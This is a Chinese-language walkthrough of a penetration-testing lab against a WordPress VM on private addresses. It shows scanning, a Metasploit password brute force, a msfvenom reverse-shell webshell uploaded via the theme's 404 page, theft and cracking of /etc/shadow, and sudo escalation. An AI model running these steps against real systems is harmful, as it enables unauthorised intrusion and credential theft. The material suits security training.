穷举法的基本思想是根据题目的部分文件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题误解。穷举法也称为枚举法
web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果
kali 192.168.20.128
靶机 192.168.20.135
链接:https://pan.baidu.com/s/1c3_4jThdV5ZSOMLI7SSOaA 提取码:0ykb
nmap -sV 192.168.20.135
nmap -A -v -T4 192.168.20.135
探测敏感信息
nikto -host http://192.168.20.135
深入挖掘
发现/secret/,点击login
wpscan用户名枚举
wpscan --url vtcsec/secret/ --enumerate u
发现用户名admin
使用msfconsole暴力破解
启动msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt
set targeturi /secret/
set rhosts 192.168.20.135
run
获取账号admin和密码admin进行登录
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw
在后台404处上传webshell
反弹shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.20.128
run
访问404页面
http://192.168.20.135/secret/wp-content/themes/twentyseventeen/404.php
查看系统信息
发现并不是root权限
下载etc/passwd和/etc/shaodw
转换文件格式
使用john破解密码
提权
su - marlinspike
sudo -l
sudo -bash